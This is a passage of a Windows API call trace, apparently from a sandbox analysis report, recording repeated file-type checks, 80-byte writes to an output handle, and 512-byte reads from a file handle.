(_FileHandle=1) returned 0x4c [0107.524] GetFileType (hFile=0x4c) returned 0x1 [0107.524] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.524] GetFileType (hFile=0x4c) returned 0x1 [0107.524] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.524] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.524] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.524] GetFileType (hFile=0x4c) returned 0x1 [0107.524] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.524] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.531] GetFileType (hFile=0x4c) returned 0x1 [0107.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.531] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.531] GetFileType (hFile=0x4c) returned 0x1 [0107.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.531] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.531] GetFileType (hFile=0x4c) returned 0x1 [0107.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.531] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.531] GetFileType (hFile=0x4c) returned 0x1 [0107.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.531] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.532] GetFileType (hFile=0x4c) returned 0x1 [0107.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.532] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.532] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.532] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.532] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.532] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.532] GetFileType (hFile=0x4c) returned 0x1 [0107.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.532] GetFileType (hFile=0x4c) returned 0x1 [0107.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.532] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.532] GetFileType (hFile=0x4c) returned 0x1 [0107.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.532] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.532] GetFileType (hFile=0x4c) returned 0x1 [0107.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.532] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.532] GetFileType (hFile=0x4c) returned 0x1 [0107.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.532] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.533] GetFileType (hFile=0x4c) returned 0x1 [0107.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.533] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.533] GetFileType (hFile=0x4c) returned 0x1 [0107.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.533] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.533] GetFileType (hFile=0x4c) returned 0x1 [0107.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.533] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.533] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.533] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.533] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.533] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.533] GetFileType (hFile=0x4c) returned 0x1 [0107.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.533] GetFileType (hFile=0x4c) returned 0x1 [0107.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.533] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.534] GetFileType (hFile=0x4c) returned 0x1 [0107.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.534] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.534] GetFileType (hFile=0x4c) returned 0x1 [0107.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.534] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.534] GetFileType (hFile=0x4c) returned 0x1 [0107.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.534] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.534] GetFileType (hFile=0x4c) returned 0x1 [0107.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.534] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.534] GetFileType (hFile=0x4c) returned 0x1 [0107.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.534] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.534] GetFileType (hFile=0x4c) returned 0x1 [0107.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.534] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.534] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.534] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.535] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.535] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.535] GetFileType (hFile=0x4c) returned 0x1 [0107.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.535] GetFileType (hFile=0x4c) returned 0x1 [0107.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.535] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.535] GetFileType (hFile=0x4c) returned 0x1 [0107.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.535] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.535] GetFileType (hFile=0x4c) returned 0x1 [0107.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.535] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.535] GetFileType (hFile=0x4c) returned 0x1 [0107.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.535] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.535] GetFileType (hFile=0x4c) returned 0x1 [0107.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.535] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.535] GetFileType (hFile=0x4c) returned 0x1 [0107.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.535] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] GetFileType (hFile=0x4c) returned 0x1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.536] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.536] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.536] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.536] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] GetFileType (hFile=0x4c) returned 0x1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] GetFileType (hFile=0x4c) returned 0x1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] GetFileType (hFile=0x4c) returned 0x1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] GetFileType (hFile=0x4c) returned 0x1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] GetFileType (hFile=0x4c) returned 0x1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] GetFileType (hFile=0x4c) returned 0x1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] GetFileType (hFile=0x4c) returned 0x1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] GetFileType (hFile=0x4c) returned 0x1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.537] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.537] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.537] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.537] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] GetFileType (hFile=0x4c) returned 0x1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] GetFileType (hFile=0x4c) returned 0x1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] GetFileType (hFile=0x4c) returned 0x1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] GetFileType (hFile=0x4c) returned 0x1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] GetFileType (hFile=0x4c) returned 0x1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] GetFileType (hFile=0x4c) returned 0x1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] GetFileType (hFile=0x4c) returned 0x1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] GetFileType (hFile=0x4c) returned 0x1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.538] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.538] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.538] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.538] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] GetFileType (hFile=0x4c) returned 0x1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] GetFileType (hFile=0x4c) returned 0x1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] GetFileType (hFile=0x4c) returned 0x1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] GetFileType (hFile=0x4c) returned 0x1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] GetFileType (hFile=0x4c) returned 0x1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] GetFileType (hFile=0x4c) returned 0x1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.539] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.539] GetFileType (hFile=0x4c) returned 0x1 [0107.539] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.539] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.539] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.539] GetFileType (hFile=0x4c) returned 0x1 [0107.539] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.539] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.539] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.539] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.539] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.539] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.539] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.539] GetFileType (hFile=0x4c) returned 0x1 [0107.539] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.539] GetFileType (hFile=0x4c) returned 0x1 [0107.539] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.539] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.539] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.539] GetFileType (hFile=0x4c) returned 0x1 [0107.539] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.539] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.539] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.539] GetFileType (hFile=0x4c) returned 0x1 [0107.539] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.539] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, 